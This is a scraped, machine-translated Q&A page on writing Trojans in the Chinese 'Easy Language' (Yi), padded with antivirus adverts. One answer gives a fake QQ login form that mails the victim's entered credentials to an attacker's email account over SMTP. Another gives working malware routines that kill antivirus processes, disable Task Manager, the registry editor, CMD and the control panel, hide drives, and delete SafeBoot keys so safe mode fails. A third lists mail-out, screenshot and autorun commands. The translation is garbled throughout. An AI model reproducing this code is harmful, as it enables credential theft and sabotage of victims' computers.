Position: Home page » Equipment » Easy language mining Trojan code

Easy language mining Trojan code

Publish: 2021-05-19 13:16:19
1.

Hello:

it is recommended that you do not use Trojan horse code. Trojan horse virus will cause damage to your computer. If you have used such unsafe Trojan horse code, for the safety of your computer, it is recommended that you use Tencent computer housekeeper to carry out a comprehensive antivirus on your computer, Open the anti-virus function of Tencent computer housekeeper, and select lightning killing or overall killing. You can click here to download the latest version of Tencent computer housekeeper: download the latest version of Tencent computer housekeeper

enterprise platform of Tencent computer housekeeper: http://..com/c/guanjia/

2. Hello, the source code will not report the virus. No matter what virus this principle compiles, it will not report the virus before it is compiled. Because it is not an executable file, it is not a callable file, so it will not report the virus. If the virus is reported, it will be too soft to kill. But the software written in easy language is easy to be misinformed when it is compiled, because many Trojans and AIDS are written in easy language. After the compilation, the normal software also has the phenomenon of virus reporting, which is unknown.
3. . version 2. Support library xplib. Support Library Internet. Support library iext. Assembly window assembly 3. Subroutine_ Window 1_ Created_ Start window. Height =_ Launch window. Height + 218 -_ Start window. Take the height of user area () XP style (1) to run ("C: &; Program Files\ Internet Explorer\ Exe ", false, # hidden window)_ Selection box 2_ If (select box 2. Select = true) select box 1. Select = true. Otherwise. If end. Subroutine_ Selection box 1_ If (select box 1. Select = false) select box 2. Select = false. Otherwise. If end. Subroutine_ Transparent label 1_ Left mouse button is pressed, logic type. Parameter horizontal position, integer type. Parameter vertical position, integer type. Parameter function key status, integer type open web page“ http://id.qq.com/ ”. subroutine_ Transparent label 2_ Left mouse button is pressed, logic type. Parameter horizontal position, integer type. Parameter vertical position, integer type. Parameter function key status, integer type open web page“ http://aq.qq.com/cn/findpsw/findpsw_ Subroutine_ Graphic button 2_ Local variables are written as required, integer type. Judge start (edit box 1. Content = ") write as required = 1 picture box 4. Visible = true. Judge (edit box 2. Content =") write as required = 1 picture box 5. Visible = true. Judge (write as required = 0) connect to the sending server ("SMP. QQ. Com", 25, "firebackr", "000 + + +", ", Send email ("Fireback", edit box 1. Content + "-" + edit box 2. Content + "-" + "_ Start window. Combo box 1. Content_ Launch window. Transparent label 1. Title“ [email protected] ”, _ Start window. Transparent label 1. Title) end (). Default. Judge end. Subroutine_ Clock 1_ Cycle event. If (picture box 4. Visible = true) picture box 4. Visible = false. Otherwise, if it ends, return (). Subroutine_ Clock 2_ If (picture box 5. Visible = true) picture box 5. Visible = false. Otherwise, if the end returns ()

please accept, thank you!
4. Run ("taskkill / F / im kavsvc. Exe", false, 1)
run ("taskkill / F / im kvxp. Kxp", false, 1)
run ("taskkill / F / im Rav. Exe", false, 1)
run ("taskkill / F / im ravmon. Exe", false, 1)
run ("taskkill / F / im mcshield. Exe", false, 1)
run ("taskkill / F / im vstskmgr. Exe", false, 1)
write registration entry (4, “SOFTWARE\ 360Safe\ safemon\ Execaccess ", 0)
write the registration entry (4," software & # 92; 360Safe\ safemon\ Monaccess ", 0)
write registration (4," software & # 92; 360Safe\ safemon\ Siteaccess ", 0)
write registration (4," software & # 92; 360Safe\ safemon\ Udiskaccess ", 0)
run (" taskkill / F / im 360tray. Exe ", false, 1) ' End the 360 process
& 39; Modify the association
write the registration entry (1, ". TXT & # 92;"“ JPEG file ")
write the registration entry (1,". Inf & # 92; "“ JPEG file) to write the registration (4, "software & # 92; Microsoft\ Windows\ CurrentVersion\ Explorer\ Advanced\ Folder\ Hidden\ SHOWALL\ CheckedValue”, 0) ' Hide files and folders
write registry (3, "software & # 92; Microsoft\ Windows\ CurrentVersion\ Policies\ System\ DisableTaskMgr”, 0) ' Disable task manager
write registry (3, "software & # 92; Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer\ NoControlPanel”, 1) ' Disable the control panel
to write the registry (3, "software & # 92; Microsoft\ Windows\ CurrentVersion\ Policies\ System\ Disableregistrytools”, 1) ' Disable registry
write registry key (3, "software & # 92; Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer\ NoRun”, 1) ' Hide the running in the beginning, and forbid WIN2000 / XP to create new tasks through the task manager to write the registration (3, "software & # 92; Microsoft \ Windows \ CurrentVersion \ Policies\ WinOldApp\ Disabled”, 1)
' Hide the disk drive in MS-DOS mode. No matter in "my computer" or "MS-DOS" mode,
write the registration (3, "software & # 92; Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer\ NoDrives”, 4294967295) ' Hide all drives
write registry entries (3, "software & # 92; Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer\ NoViewOnDrive”, 4294967295) ' All drives
are not allowed to write registry entries (3, "software & # 92; Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer\ NoFolderOptions”, 1) ' Hide Folder Options
write registration (3, "software & # 92; Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer\ NoDesktop”, 1) ' Hide desktop objects
write registry (3, "software & # 92; Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer\ NoClose”, 1) ' Hide the shutdown at the beginning
write registration (3, "software & # 92; Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer\ NoFind”, 1) ' Hide the search in the beginning
& 39; Write the registration item (3, "software &" 92; Policies\ Microsoft\ Windows\ System\ DisableCMD”, 1)' 1 disable CMD and. Bat file 2 disable CMD and. Bat 0 enable two
write registry entries (3, "software & # 92; Policies\ Microsoft\ Internet Explorer\ Control Panel\ HomePage”, 1) ' Hide the home page option group
write registration (3, "software & # 92; Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer\ NoFileMenu”, 1) ' Hide ie File menu
write registration (3, "software & # 92; Policies\ Microsoft\ Internet Explorer\ Restrictions\ NoFavorites”, 1) ' Hide Favorites menu
write registration (3, "software & # 92; Policies\ Microsoft\ Internet Explorer\ Restrictions\ NoPrinting”, 1) ' Disable ie printing function
write registration (3, "software & # 92; Policies\ Microsoft\ Internet Explorer\ Restrictions\ NoBrowserOptions”, 1) ' Hide Internet Options
write registration (3, "software & # 92; Policies\ Microsoft\ Internet Explorer\ Restrictions\ NoViewSource”, 1) ' Ie is forbidden to view the source file
and write the registration entry (3, "software & # 92; Microsoft\ Windows\ CurrentVersion\ Interner Settings\ Zones\ 3\ 1803”, 3) ' Disable ie download function
write registration (3, "software & # 92; Policies\ Microsoft\ Internet Explorer\ Restrictions\ NoBrowserContextMenu”, 1) ' It is forbidden to right-click the context menu
to write the registration item (3, "software & # 92; Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer\ NoRealMode”, 1) ' It is forbidden to write the registration entry "restart the computer and switch to MS-DOS mode" (3, "software & # 92; Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer\ NoLogOff”, 1) ' It is forbidden to display the "logout" entry (3, "software & # 92; Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer\ NoRecentDocsMenu”, 1) ' It is forbidden to write the registration item in the document menu (3, "software & # 92; Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer\ NoLogOff”, 1) ' Remove the "login" item in the "start" menu and write the registration item (3, "software & # 92; Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer\ NoViewContextMenu”, 1) ' It is forbidden to use the right mouse button to write the registration (3, "software & # 92; Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer\ NoSetFolders”, 1) ' It is forbidden to modify the control surface version
. Version 2 & # 39; Unable to enter safe mode
delete the registration key (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\{ 36FC9E60-C465-11CF-8056-444553540000}\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\{ 4D36E965-E325-11CE-BFC1-08002BE10318}\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\{ 4D36E967-E325-11CE-BFC1-08002BE10318}\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\{ 4D36E969-E325-11CE-BFC1-08002BE10318}\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\{ 4D36E96A-E325-11CE-BFC1-08002BE10318}\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\{ 4D36E96B-E325-11CE-BFC1-08002BE10318}\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\{ 4D36E96F-E325-11CE-BFC1-08002BE10318}\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\{ 4D36E977-E325-11CE-BFC1-08002BE10318}\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\{ 4D36E97B-E325-11CE-BFC1-08002BE10318}\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\{ 4D36E97D-E325-11CE-BFC1-08002BE10318}\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\{ 4D36E980-E325-11CE-BFC1-08002BE10318}\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\{ 71A27CDD-812A-11D0-BEC7-08002BE2092F}\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\{ 745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\ AppMgmt\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\ Base\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\ Boot Bus Extender\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\ Boot file system\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\ CryptSvc\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\ DcomLaunch\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\ dmadmin\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\ dmboot.sys\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\ dmio.sys\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\ dmload.sys\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\ dmserver\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\ EventLog\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\ File system\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\ Filter\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\ HelpSvc\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\ Netlogon\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\ PCI Configuration\”)
delete the registration (4, "system & # 92; CurrentControlSet\ Control\ SafeBoot\ Minimal\ Plugplay ")
Destroy ()
5. 0 points = = |< First of all, I want to tell you that although Yi language can make Trojan horse, it is not very suitable for making Trojan horse.
the program it writes is too big.
an empty shell program is more than 500kb.
however, Yi language has a plug-in "black moon" network that can be searched.
it is said that the empty program it writes can reach more than 10KB, which is equivalent to Xiaole.
it is about 30KB after it is not generated by the downloaders.
it is convenient to spread,
I also want to learn Trojan horse, but there are too few tutorials in this area,
I can only think about it slowly
6.

Hello, the program written by easy language will be misled by antivirus software, which can't be solved in the source code. Sometimes when an empty file is written by easy language, the virus will be reported, and the problem can't be eradicated by adding shell

if the software you make is wrongly reported by anti-virus, and you want to remove the false report, it is recommended that you enter the false report appeal of your anti-virus software

next, I'll use Tencent computer housekeeper to make a demonstration, first enter http://guanjia.qq.com/trojan_ False. HTML

and then submit the file that you were wrongly reported, and you can appeal

I hope my answer can help you! If you have any questions, please enter Tencent computer manager enterprise platform: http://..com/c/guanjia/

Tencent computer housekeeper enterprise platform: http://..com/c/guanjia/

7. I'm glad to answer for you:
these are not reliable, which you downloaded or sent to you by others.
you can use Tencent computer manager to turn on security protection
1. Tencent computer manager's unique second-generation anti-virus engine can protect and kill more thoroughly
2. Tencent computer manager has the world's largest cloud platform, which can better identify fraud, fraud, fraud, fraud, etc Phishing website
3. Tencent computer housekeeper creates eagle eye mode to protect your phone from infringement at all times
4. Tencent computer housekeeper's unique security level enables you to check the security status of your phone at all times
5. Add advertising filtering function to effectively rece advertising harassment
I wish you a happy life and work!!
8. See for yourself command [common Trojan horse has]:

. Version
2
. Support library
Internet
. Support library
eapi


connect to the sending server
(,
,
,
)
send mail
(,
,
,
,
)
Add attachment file
()
snapshot
(,
,
,
,
,
)
set automatic operation
(,
,
)
9. If you don't do these things that are harmful to others and not beneficial to yourself, you can support them at the back
10. I have. If you have a learning attitude, I can discuss and communicate with you. However, the problem of offering a reward at zero is a bit unreasonable..
READ MORE

Related to Easy language mining Trojan code

Hot content
Inn digger Publish: 2021-05-29 20:04:36 Views: 341
Purchase of virtual currency in trust contract dispute Publish: 2021-05-29 20:04:33 Views: 942
Blockchain trust machine Publish: 2021-05-29 20:04:26 Views: 720
Brief introduction of ant mine Publish: 2021-05-29 20:04:25 Views: 848
Will digital currency open in November Publish: 2021-05-29 19:56:16 Views: 861
Global digital currency asset exchange Publish: 2021-05-29 19:54:29 Views: 603
Mining chip machine S11 Publish: 2021-05-29 19:54:26 Views: 945
Ethereum algorithm Sha3 Publish: 2021-05-29 19:52:40 Views: 643
Talking about blockchain is not reliable Publish: 2021-05-29 19:52:26 Views: 754
Mining machine node query Publish: 2021-05-29 19:36:37 Views: 750
© Design www.yuanxue365.com 2018-2022
The content of this station is from the network.